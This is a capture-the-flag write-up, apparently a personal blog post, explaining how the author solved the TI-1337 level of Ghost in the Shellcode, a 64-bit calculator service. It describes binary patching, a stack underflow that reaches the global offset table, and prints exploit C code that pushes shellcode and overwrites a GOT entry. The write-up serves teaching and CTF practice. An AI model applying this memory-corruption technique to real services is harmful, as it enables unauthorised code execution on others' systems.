Hey everybody,

This past weekend was Shmoocon, and you know what that means—Ghost in the Shellcode!

Most years I go to Shmoocon, but this year I couldn't attend, so I did the next best thing: competed in Ghost in the Shellcode! This year, our rag-tag band of misfits—that is, the team who purposely decided not to ever decide on a team name, mainly to avoid getting competitive—managed to get 20th place out of at least 300 scoring teams!

I personally solved three levels: TI-1337, gitsmsg, and fuzzy. This is the first of three writeups, for the easiest of the three: TI-1337—solved by 44 teams.

You can download the binary, as well as the exploit, the IDA Pro files, and everything else worth keeping that I generated, from my Github repository.



Getting started

Unlike some of my teammates, I like to dive head-first into assembly, and try not to drown. So I fired up IDA Pro to see what was going on, and I immediately noticed is that it's a 64-bit Linux binary, and doesn't have a ton of code. Having never in my life written a 64-bit exploit, this would be an adventure!

Small aside: Fork this!

I'd like to take a quick moment to show you a trick I use to solve just about every Pwn-style CTF level: getting past that pesky fork(). Have you ever been trying to debug a vuln in a forking program? You attach a debugger, it forks, it crashes, and you never know. So you go back, you set affinity to 'child', you debug, the debugger follows the child, catches the crash, and the socket doesn't get cleaned up properly? It's awful! There is probably a much better way to do this, but this is what I do.

First, I load the binary into IDA and look for the fork() call:

.text : 00400F65 good_connection : .text : 00400F65 E8 06 FD FF FF call _fork .text : 00400F6A 89 45 F4 mov [ rbp + child_pid ], eax .text : 00400F6D 83 7 D F4 FF cmp [ rbp + child_pid ], 0 FFFFFFFFh .text : 00400F71 75 02 jnz short fork_successful

You'll note that opcode bytes are turned on, so I can see the hex-encoded machine code along with the instruction. The call to fork() has the corresponding code e8 06 fd ff ff . That's what I want to get rid of.

So, I open the binary in a hex editor, such as 'xvi32.exe', search for that sequence of bytes (and perhaps some surrounding bytes, if it's ambiguous), and replace it with 31 c0 90 90 90 . The first two bytes— 31 c0 —is "xor eax, eax" (ie, clear eax), and 90 90 90 is "nop / nop / nop". So basically, the function does nothing and returns 0 (ie, behaves as if it's the child process).

You may want to kill the call to alarm(), as well, which will kill the process if you spend more than 30 seconds looking at it. You can replace that call with 90 90 90 90 90 —it doesn't matter what it returns.

I did this on all three levels, and I renamed the new executable "<name>-fixed". You'll find them in the Github repository. I'm not going to go over that again in the next two posts, but I'll be referring back to this instead.

The program

Since this is a post on exploitation, not reverse engineering, I'm not going to go super in-depth into the code. Instead, I'll describe it at a higher level and let you delve in more deeply if you're interested.

The main handle_connection() function can be found at offset 0x00401567. It immediately jumps to the bottom, which is a common optimization for a 'for' or 'while' loop, where it calls the code responsible for receiving data—the function at 0x00401395. After receiving data, it jumps back to the top of handle_connection() function, just after the jump to the bottom, where it goes through a big if/else list, looking for a bunch of symbols (like '+', '-', '/' and '*'—look familiar?)

After the if/else list, it goes back to the receive function, then to the top of the loop, and so on. Receive, parse, receive, parse, etc. Let's look at those two pieces separately, then we'll explore the vulnerability and see the exploit.

Receive

As I mentioned above, the receive function starts at 0x00401395.

This function starts by reading up to 0x100 (256) bytes from the socket, ending at a newline (0x0a) if it finds one. This is done using a simple receive-loop function located at 0x0040130E that is worthwhile going through, if you're new to this, but that doesn't add much to the exploit.

After reading the input, it's passed to sscanf(buffer, "%lg", ...) . The format string "%lg" tells sscanf() to parse the input as a "double" variable—a 64-bit floating point. Great: a x64 process handling floating point values; that's two things I don't know!

If the sscanf() fails—that is, the received data isn't a valid-looking floating point value—the received data is copied wholesale into the buffer. A flag at the start of the buffer is set indicating whether or not the double was parsed.

Then the function returns. Quite simple!

Processing the data

I mentioned earlier that this binary looks for mathematical symbols—'+', '-', '*', '/' in the received data. I didn't actually notice that right away, nor did the name "TI-1337" (or the fact that it used port "31415"... think about it) lead me to believe this might be a calculator. I'm not the sharpest pencil sometimes, but I try hard!

Anyway, back to the main parsing code (near the top of the function at 0x00401567 again)! The parsing code is actually divided into two parts: a short piece of code that runs if a valid double was received (ie, the sscanf() worked), and a longer one that runs if it wasn't a double. The short piece of code simply calls a function (spoiler alert: the function pushes it onto a global stack object they use, not to be confused with the runtime stack). The longer one performs a bunch of string comparisons and does soemthing based on those.

I think at this point I'll give away the trick: whole application is a stack-based calculator. It allocates a large chunk of memory as a global variable, and implements a stack (a length followed by a series of 64-bit values). If you enter a double, it's pushed onto the stack and the length is incremented. If you enter one of a few symbols, it pops one or more values (without checking if we're at the beginning!), updates the length, and performs the calculation. The new value is then pushed back on top of the stack.

Here's an example session:

(sent) 10 (sent) 20 (sent) + (sent) . (received) 30

And a list of all possible symbols:

+ :: pops the top two elements off the stack, adds them, pushes the result

- :: same as '+', except it subtracts

* :: likewise, multiplication

/ :: and, to round it out, division

^ :: exponents

! :: I never really figured this one out, might be a bitwise negation (or might not, it uses some heavy floating point opcodes that I didn't research :) )

. :: display the current value

b :: display the current value, and pop it

q :: quit the program

c :: clear the stack

And, quite honestly, that's about it! That's how it works, let's see how to break it!

The vulnerability

As I alluded to earlier, the program fails to check where on the stack it currently is when it pops a value. That means, if you pop a value when there's nothing on the stack, you wind up with a buffer underflow. Oops! That means that if we pop a bunch of times then push, it's going to overwrite something before the beginning of the stack.

So where is the stack? If you look at the code in IDA, you'll find that the stack starts at 0x00603140—the .bss section. If you scroll up, before long you'll find this:

.got.plt : 0060301 8 off_603018 dq offset free .got.plt : 00603020 off_603020 dq offset recv .got.plt : 0060302 8 off_603028 dq offset strncpy .got.plt : 00603030 off_603030 dq offset setsockopt ...

The global offset table! And it's readable/writeable!

If we pop a couple dozen times, then push a value of our choice, we can overwrite any entry—or all entries—with any value we want!

That just leaves one last step: where to put the shellcode?

Aside: floating point

One gotcha that's probably uninteresting, but is also the reason that this level took me significantly longer than it should have—the only thing you can push/pop on the application's stack is 64-bit double values! They're read using "%lg", but if I print stuff out using printf("%lg", address) , it would truncate the numbers! Boo!

After some googling, I discovered that you had to raise printf's precision a whole bunch to reproduce the full 64-bit value as a decimal number. I decided that 127 decimal places was more than enough (probably like 5x too much, but I don't even care) to get a good result, so I used this to convert a series of 8 bytes to a unique double:

sprintf(buf, " %.127lg

" , d);

I incorporated that into my push() function:

void do_push( int s, char *value) { char buf[ 1024 ]; double d; memcpy(&d, value, 8 ); sprintf(buf, " %.127lg

" , d); printf( "Pushing %s " , buf); if (send(s, buf, strlen(buf), 0 ) != strlen(buf)) perror( "send error!" ); }

And it worked perfectly!

The exploit

Well, we have a stack (one again, not to be confused with the program's stack) where we can put shellcode. It has a static memory address and is user-controllable. We also have a way to encode the shellcode (and addresses) so we wind up with fully controlled values on the stack. Let's write an exploit!

Here's the bulk of the exploit:

int main( int argc, const char *argv[]) { char buf[ 1024 ]; int i; int s = get_socket(); for (i = 0 ; i < strlen(shellcode); i += 8 ) do_push(s, shellcode + i); for (i = 0 ; i < strlen(shellcode); i += 8 ) do_pop(s); for (i = 0 ; i < 38 ; i++) do_pop(s); do_push(s, TARGET); sprintf(buf, ".

" ); send(s, buf, strlen(buf), 0 ); sleep( 100 ); return 0 ; }

You can find the full exploit here!

Conclusion

And that's all there is to it! Just push the shellcode on the stack, pop our way back to the .got.plt section, and push the address of the stack. Bam! Execution!

That's all for now, stay tuned for the much more difficult levels: gitsmsg and fuzzy!